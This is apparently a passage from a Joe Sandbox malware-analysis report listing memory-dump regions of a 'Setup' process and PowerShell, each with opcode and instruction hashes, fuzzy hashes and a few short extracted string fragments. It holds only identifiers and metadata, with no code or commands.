                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c2fd4d3e156d30c0c2b8dc8dc78c1b6c267880f9e00ddefb7542dcc745552709
                                                                                                                      • Instruction ID: 99593756fee6cad7f58c6a4da9ddf5300029e7777c0a2735466679af9cbd14ac
                                                                                                                      • Opcode Fuzzy Hash: c2fd4d3e156d30c0c2b8dc8dc78c1b6c267880f9e00ddefb7542dcc745552709
                                                                                                                      • Instruction Fuzzy Hash: D1219337E6182047D310CD59CC4439176A6ABD9339F3E87B48C64AB696C97BAC1386C4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8b2e9dadbfc06b250beeb47e3ba99bf0e96b002a6c66f7abfa31b8583831dc87
                                                                                                                      • Instruction ID: 4e49fdd23062e04a46ea2128f1e5bb188e4b1f708609c2241b9ffc4e5de53bd1
                                                                                                                      • Opcode Fuzzy Hash: 8b2e9dadbfc06b250beeb47e3ba99bf0e96b002a6c66f7abfa31b8583831dc87
                                                                                                                      • Instruction Fuzzy Hash: 2E11D57664D3415FD708CF21998225FBFD2EBD6618F28892DC0C19B305C634D6078B9A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0dde1d185a3a96b50935572f1b6a31261510dc9a8ba5621e37bb35a340a5af16
                                                                                                                      • Instruction ID: 6dec40d44f6f1478fb5cc020eb586407af4669d14073affd770c4fcb2572cbbc
                                                                                                                      • Opcode Fuzzy Hash: 0dde1d185a3a96b50935572f1b6a31261510dc9a8ba5621e37bb35a340a5af16
                                                                                                                      • Instruction Fuzzy Hash: CF01DE30E18201DBEF148F64EC40FBAB3B4E742320F618468E115E3290DB34BC499B18
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
                                                                                                                      • Instruction ID: bb3da189e2add67956c81595eec89ef50467086bdc9594e32b55f115e59ee5e5
                                                                                                                      • Opcode Fuzzy Hash: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
                                                                                                                      • Instruction Fuzzy Hash: EA31A274E00209DFCB08CF98C590AAEBBB1FF48315F208199D916AB345D331AE86DF94
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                      • Instruction ID: c5e405c6e1180a4967c4d92bca4b3e71b1514297395937329f08c897c4d7c7a0
                                                                                                                      • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                      • Instruction Fuzzy Hash: 5411E933A451E10EC31A9D3C84405E5BFE30A93234B19839DF4F49F2D2D6279D8A9358
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 61a9ea1310a047bf288d5b23dfb3268fa3b56f53819aa84228a733fc79c1270e
                                                                                                                      • Instruction ID: f9e378f49c2635215a0d02784826436b7c532946b3d443b5f17ba23aef9cba0d
                                                                                                                      • Opcode Fuzzy Hash: 61a9ea1310a047bf288d5b23dfb3268fa3b56f53819aa84228a733fc79c1270e
                                                                                                                      • Instruction Fuzzy Hash: C001B5F1A1030197DB20AE2198D1B27B3A86F9A721F08802ED90C47302DBB5EC08E392
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a4f8e935b6a073c41328104dc53de427b0534e0b35fcdedb2bf83b6ac7362c58
                                                                                                                      • Instruction ID: a757430be944fb055ea863f974c77b0f7a9dc6a7545bce3835c41d68adfc5709
                                                                                                                      • Opcode Fuzzy Hash: a4f8e935b6a073c41328104dc53de427b0534e0b35fcdedb2bf83b6ac7362c58
                                                                                                                      • Instruction Fuzzy Hash: CA01BD71E4832087EB389E148CD0779B7A1DBD2391F29822CE885E32A1DEA85C07D355
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0eda4779668bc893f3a83e1dd7a542ce7d87a14aaa960a7ab6d9bb8588bcf8cd
                                                                                                                      • Instruction ID: 069174af7b4b16e092e23611c0c996f3c24182dbeb443e9e86e8cf0b03aa78fa
                                                                                                                      • Opcode Fuzzy Hash: 0eda4779668bc893f3a83e1dd7a542ce7d87a14aaa960a7ab6d9bb8588bcf8cd
                                                                                                                      • Instruction Fuzzy Hash: FA01A274A087428A8B188F24C090537B3F0FF6A352F21682EE4CADB221D735C945EB5B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: eac98e64f53b04a5c47305656da61d959d058aa5ab303d061a0c19db4d70893d
                                                                                                                      • Instruction ID: 7703f8d56f7d4db535b778741e5eefbc3a6029865862c6d3468471a412b772cf
                                                                                                                      • Opcode Fuzzy Hash: eac98e64f53b04a5c47305656da61d959d058aa5ab303d061a0c19db4d70893d
                                                                                                                      • Instruction Fuzzy Hash: 2201D27590C310DBDB14DF18A89053AF3A1EB9A320F16A86DD48957222C371AD04DBA7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                      • Instruction ID: 1414dafa1a1a5c59977f86d657b8d335ba854a3eb9394ff7f65e87b7c3362b6b
                                                                                                                      • Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                      • Instruction Fuzzy Hash: 2901F634A01108EFCB54DF98C684AACF7B1FB44321F208699ED019B384CB30BE86EB40
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 49a57a374e7b92da58926fee3662f18fbeca5f6832b05311bcfaf529b72eaefe
                                                                                                                      • Instruction ID: 77d71fb73c48bc7b6c637240be80a1889d1e15d122f59f0988ca17eab331f55c
                                                                                                                      • Opcode Fuzzy Hash: 49a57a374e7b92da58926fee3662f18fbeca5f6832b05311bcfaf529b72eaefe
                                                                                                                      • Instruction Fuzzy Hash: C5E04F65A0E3D08FE3038B315CA1AA67FB8AD1750130E51EBD4C5D74B3E118D80DEB25
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 179e546be2c89a5196f3c77cc577ea7f0a6bfaeda2597812c11e1b6d76dc7558
                                                                                                                      • Instruction ID: 7689eaa874dd34b7df5da9dec32181a108fde4a108d577a9a326fac34469d256
                                                                                                                      • Opcode Fuzzy Hash: 179e546be2c89a5196f3c77cc577ea7f0a6bfaeda2597812c11e1b6d76dc7558
                                                                                                                      • Instruction Fuzzy Hash: 69E06D76E443505BD314CF20C8805A57322ABC7225B19C32CDD6D17390CA34AC46DA98
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 34da6dfc78b610b8d01f5b053daabf976709746f79f29ed25fb5e1270cdb39c6
                                                                                                                      • Instruction ID: 811bc2136c9aad90335ce9b3c55875507eb5a06adc9d49d47426033ed2f8441b
                                                                                                                      • Opcode Fuzzy Hash: 34da6dfc78b610b8d01f5b053daabf976709746f79f29ed25fb5e1270cdb39c6
                                                                                                                      • Instruction Fuzzy Hash: 4CD05B44E3CB5743B3191F25487133AA5D64B03312F28D06AD4D68B271E51DCA412795
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1452c59139b1f1344503ac04a460069e96c8f72455f2677b5d088068f56243fa
                                                                                                                      • Instruction ID: f570ecd46098945477d2cda5002067711e20734139de1194ef4295da0640c121
                                                                                                                      • Opcode Fuzzy Hash: 1452c59139b1f1344503ac04a460069e96c8f72455f2677b5d088068f56243fa
                                                                                                                      • Instruction Fuzzy Hash: 21D05E64A0C3C5CFC3224F285460271FFB04F53202F0854DEE4D11B241C2658908972B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_Setup.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 23c68ee6d107102acd3101cf2726d090810583b97606fe0fbea2f0981baea95e
                                                                                                                      • Instruction ID: 3e39928d1371b5a6722d3551a25024f1be346b46f36541fdec4ac45982a5d80e
                                                                                                                      • Opcode Fuzzy Hash: 23c68ee6d107102acd3101cf2726d090810583b97606fe0fbea2f0981baea95e
                                                                                                                      • Instruction Fuzzy Hash: 0AB012E1C2810096D8049F206C81435B13C111B103F043420D409B3102D624D20C411D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2026812768.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_6da0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                      • API String ID: 0-1420252700
                                                                                                                      • Opcode ID: 1530458540cc4943a4210cd2c9a0bdb197aba546586b4f5a1f7efc5199a6cbb2
                                                                                                                      • Instruction ID: 98aa450b574a17c49d01cc270c9999edfb02bfc0218ab8b2e5ff053e12263776
                                                                                                                      • Opcode Fuzzy Hash: 1530458540cc4943a4210cd2c9a0bdb197aba546586b4f5a1f7efc5199a6cbb2
                                                                                                                      • Instruction Fuzzy Hash: 55122632B083548FDB558B699C1076BBBA2AFC6310F18847AD945CB3A1DF36C945C3E2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2018567458.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_43f0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e306b511f300cecbd25bb3f1c940b7fbd833aa1f3766ce679d5c7f765251aab2
                                                                                                                      • Instruction ID: 6c418351b3b10ecc3b48c41103ccffe55a0dea5d4b4aa83b7ed0e6f6b516f054
                                                                                                                      • Opcode Fuzzy Hash: e306b511f300cecbd25bb3f1c940b7fbd833aa1f3766ce679d5c7f765251aab2
                                                                                                                      • Instruction Fuzzy Hash: 9D915A74A00245CFCB15CF59C8949AEFBB1FF88310B2485A9D915AB3A5D736FC51CBA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2026812768.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_6da0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 233052c877f6a7e7175da1b450e3c2716df13dd0e6cd3b73131175cdda1bc1fe
                                                                                                                      • Instruction ID: 85e899bd3a772e3b5c04843943c70620566253e5703f5fcfe581217250fe35af
                                                                                                                      • Opcode Fuzzy Hash: 233052c877f6a7e7175da1b450e3c2716df13dd0e6cd3b73131175cdda1bc1fe
                                                                                                                      • Instruction Fuzzy Hash: 76412432E09320CFDB958F658D41A7ABBB2AFC1350F1880A5D8419F261DB3AC941C7F1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2018567458.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_43f0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e6b55be232dbd25fe38f2e8ba25c6b962eab913e04ce4f0d219546f03257cdb8
                                                                                                                      • Instruction ID: a8a937ccf149777acabdf59e6c2e1449008543bd693b53f95d86e1ee743b7a9f
                                                                                                                      • Opcode Fuzzy Hash: e6b55be232dbd25fe38f2e8ba25c6b962eab913e04ce4f0d219546f03257cdb8
                                                                                                                      • Instruction Fuzzy Hash: CD41C375A0A3A59FCB02DB2CD9A04DABFB0AF46210B0541D7D484DB2A3D224ED49CBA5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2018567458.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_43f0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7cae92fc2e72fc062a5db4f0f7822df81852651fe9f5c04784c59c2ffa08b6ff
                                                                                                                      • Instruction ID: eefd81277332347b2c1f99402fe26711f2f3dc11db0d069652489ca6809c0966
                                                                                                                      • Opcode Fuzzy Hash: 7cae92fc2e72fc062a5db4f0f7822df81852651fe9f5c04784c59c2ffa08b6ff
                                                                                                                      • Instruction Fuzzy Hash: CE4139B4A10505DFCB09CF58C598AAAFBB1FF48310B258599D915AB368C736FC91CFA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2018567458.00000000043F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_43f0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3b60e3011f9a62437b34392844bfc00b98d2551baa6bce6eee3c92810a21f848
                                                                                                                      • Instruction ID: 569bc470252ebead07bfd4b1434c9448d0ce159cbbd0e4a332d3646d8fef69fb
                                                                                                                      • Opcode Fuzzy Hash: 3b60e3011f9a62437b34392844bfc00b98d2551baa6bce6eee3c92810a21f848
                                                                                                                      • Instruction Fuzzy Hash: 4B211DB4A002499FDB00CF59D9809AAFBB5FF89310B158599D919AB362C731FC45CFA1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2017849375.0000000003F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 03F9D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_3f9d000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b194a445202dc94aa0f8868c7f7f9467988ccd1745a667e3186f1df4da8768b3
                                                                                                                      • Instruction ID: d2401b5c0aec39b050960fd1fa712b2ec938c4492009acb27dee9b5467fee514
                                                                                                                      • Opcode Fuzzy Hash: b194a445202dc94aa0f8868c7f7f9467988ccd1745a667e3186f1df4da8768b3
                                                                                                                      • Instruction Fuzzy Hash: FE0184729093449AFB108A25CD84767FF98EF41324F2CC56AFD484A26AC6799841C6B1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2017849375.0000000003F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 03F9D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_3f9d000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 60df50245799998d274f5e4ca6f87a3632020c1a35f94412fdbc29f201313ed1
                                                                                                                      • Instruction ID: f9d8fca432c1e0403014bf1f9971d58f70b1b455fc2c14af7f61799b00f35250
                                                                                                                      • Opcode Fuzzy Hash: 60df50245799998d274f5e4ca6f87a3632020c1a35f94412fdbc29f201313ed1
                                                                                                                      • Instruction Fuzzy Hash: EC01216140E3C09FE7128B258C94752BFB4DF43224F1DC0DBE9888F1A7C2699845C772
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2026812768.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_6da0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$k$k$k$k
                                                                                                                      • API String ID: 0-1980677586
                                                                                                                      • Opcode ID: b06fab3e118064dc7e87a31c51b55261c9628ec5957039b1d6ff5fafefb6ea06
                                                                                                                      • Instruction ID: 936f3fe8e409ba4a3433efc504042a159449852f3545d8f0d333c0a6e6e12747
                                                                                                                      • Opcode Fuzzy Hash: b06fab3e118064dc7e87a31c51b55261c9628ec5957039b1d6ff5fafefb6ea06
                                                                                                                      • Instruction Fuzzy Hash: BBF11236F083148FDB649F6898016AABBF6AFC5320F18846AD546CB361DA36C945C7E1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2026812768.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_6da0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4'^q$4'^q$tP^q$tP^q$#j$$^q$$^q$$^q$k$k
                                                                                                                      • API String ID: 0-2299674365
                                                                                                                      • Opcode ID: be4a781917d8e2508d2792e1958b2ae00b76c23ad26c237c95e3221035d8ad9a
                                                                                                                      • Instruction ID: 3c81d5757c1df8c6260aad4456024eb58ee065b362e03a3ba282473db5d12bdc
                                                                                                                      • Opcode Fuzzy Hash: be4a781917d8e2508d2792e1958b2ae00b76c23ad26c237c95e3221035d8ad9a
                                                                                                                      • Instruction Fuzzy Hash: D5A16732F083548FD7658B39981067ABBE6AFC5328F28846BD445CB3A1DE36C845C7E1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2026812768.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_6da0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                                                      • API String ID: 0-2125118731
                                                                                                                      • Opcode ID: 8a75617ca29198dbdee93d33642b09051928692c349795bf71d40638d84170b5
                                                                                                                      • Instruction ID: 503e42e86c236650b645ddc45d6fc75011e11131effc181f59928b5168c1f1bd
                                                                                                                      • Opcode Fuzzy Hash: 8a75617ca29198dbdee93d33642b09051928692c349795bf71d40638d84170b5
                                                                                                                      • Instruction Fuzzy Hash: 50212731B0C3159BE7B45E6A9805B27AADB9BC1B10F25842AE545CB385DE36C841C3E1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2026812768.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_6da0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                      • API String ID: 0-2049395529
                                                                                                                      • Opcode ID: 4567f865673027de37fda92e4196e585a7c8f467ef0734b651649feea619592f
                                                                                                                      • Instruction ID: b8128a9ecb0464d5169bbe4e8d10d90608863d66acfeebd2cf399b79182fe9b6
                                                                                                                      • Opcode Fuzzy Hash: 4567f865673027de37fda92e4196e585a7c8f467ef0734b651649feea619592f
                                                                                                                      • Instruction Fuzzy Hash: 93017120B0E3958FD76A17281820A566FB65F82A14B2A449BC0C1CF2ABCD254C4983A3